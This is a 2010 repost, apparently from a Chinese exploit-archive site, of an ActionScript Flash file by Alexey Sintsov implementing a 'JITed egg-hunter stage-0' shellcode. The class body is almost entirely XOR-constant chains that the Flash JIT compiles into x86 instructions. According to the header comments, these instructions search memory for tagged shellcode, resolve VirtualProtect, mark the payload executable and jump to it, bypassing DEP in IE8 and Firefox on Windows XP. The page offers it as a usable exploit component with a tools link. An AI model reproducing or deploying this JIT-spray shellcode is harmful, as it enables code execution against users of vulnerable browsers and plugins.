首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
JITed egg-hunter stage-0 shellcode
来源:dookie@inbox.ru 作者:Sintsov 发布时间:2010-03-22  

// JITed egg-hunter stage-0 shellcode
//      (Permanent DEP bypass)
//
//      By Alexey Sintsov
// dookie@inbox.ru
// a.sintsov@dsec.ru
//
// DSecRG - Digital Security Research Group [dsecrg.com]//
//
//      TAG=3135330731353307
//                  its mean 0x07333531 twice!
//
//
//      This version is more universal than old STAGE-0 (that have use Flash Dictionary addr leakage)
//
//
//      Example of usage and tools for modify:  http://www.dsecrg.com/files/pub/tools/JIT.zip
//
//      Find shellcode by TAG          - need time ))
//      Find VirtualProtect address
//      Mark shellcode mem as executable
//      Jump on it...
// 
//
//      Tested on Windows XP SP3/SP2: IE8, FF6

package {
    import flash.display.*
 public class Loadzz2 extends MovieClip
    {
  function funcXOR1()
  {
   var jit=(0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^
   0x3c58d231^
   0x3cffca80^
   0x3c0fce80^
   0x3c429090^
   0x3c436a52^
   0x3c2ecd58^
   0x6a90053c^
   0x6a905a5a^
   0x3c90d874^
   0x31b85959^
   0x3c900733^
   0x6aaffa8b^
   0x6aafd175^
   0x6a595990^
   0x3557c775^
   0x3c44ec83^
   0x3c90C033^
   0x3c9030b0^
   0x3c008b64^
   0x3c0c408b^
   0x3c1c408b^
   0x3c08508b^
   0x3c20788b^
   0x3c90008b^
   0x6a6b3f80^
   0x3c90eA75^
   0x3c904747^
   0x6a653f80^
   0x3c90ef75^
   0x3c904747^
   0x6a723f80^
   0x3c90ef75^
   0x3c904747^
   0x6a6e3f80^
   0x3c90ef75^
   0x3c529090^
   0x3c3cc283^
   0x3c903a8b^
   0x3c24148b^
   0x3c90d703^
   0x3c78c283^
   0x3c903a8b^
   0x3c24148b^
   0x3c90d703^
   0x3c18c283^
   0x3c903a8b^
   0x3c04c283^
   0x3c901a8b^
   0x3c241c03^
   0x3c04c283^
   0x3c90328b^
   0x3c243403^
   0x3c04c283^
   0x3c900a8b^
   0x3c240c03^
   0x3cb89090^
   0x3c900000^
   0x3c9063b0^
   0x3c5074b4^
   0x3cb89090^
   0x3c906574^
   0x3c9072b0^
   0x3c506fb4^
   0x3cb89090^
   0x3c90506c^
   0x3c9075b0^
   0x3c5061b4^
   0x3cb89090^
   0x3c907472^
   0x3c9056b0^
   0x3c5069b4^
   0x3c90d78b^
   0x3c90C033^
   0x3c90ff33^
   0x3c535156^
   0x3c909090^
   0x3c909090^
   0x3c574790^
   0x3c24048b^
   0x3c02e0c1^
   0x3c90f003^
   0x3c90068b^
   0x3c20c483^
   0x3c240403^
   0x3c20ec83^
   0x3c90c933^
   0x3c900eb1^
   0x3c10c483^
   0x3c90f48b^
   0x3c90f88b^
   0x3c18c483^
   0x6a90a6f3^
   0x14901474^
   0x3c24ec83^
   0x3c595b5f^
   0x3c90905e^
   0x3c9090eb^
   0x3c24ec83^
   0x3c595b5f^
   0x3c90905e^
   0x3c90e7d1^
   0x3c90cf03^
   0x3c90c033^
   0x3c018b66^
   0x3c02e0c1^
   0x3c90c303^
   0x3c90188b^
   0x3c10c483^
   0x3c241c03^
   0x3c18c483^
   0x3c90905F^
   0x3c406a54^
   0x3c90016a^
   0x3cd3ff57^
   0x3c90e7ff^
   0x3ccccccc);   
   return jit;
  }
  
  function Loadzz2()
  {
    var ret1=funcXOR1();
  }
    }
}

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·eDisplay Personal FTP server 1
·ZKSoftware Biometric Attendenc
·KDE <= 4.4.1 Ksysguard RCE via
·no$gba 2.5c (.nds) local crash
·eDisplay Personal FTP server 1
·Crimson Editor r3.70 SEH Overw
·eDisplay Personal FTP server 1
·Apple Safari 4.0.5 (object tag
·Apple Safari <= Tag (heap spra
·RemoteHelp v0.0.7 Denial of Se
·Woltlab Burning Board Teamsite
·Kenward zipper v1.4 0day Stack
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved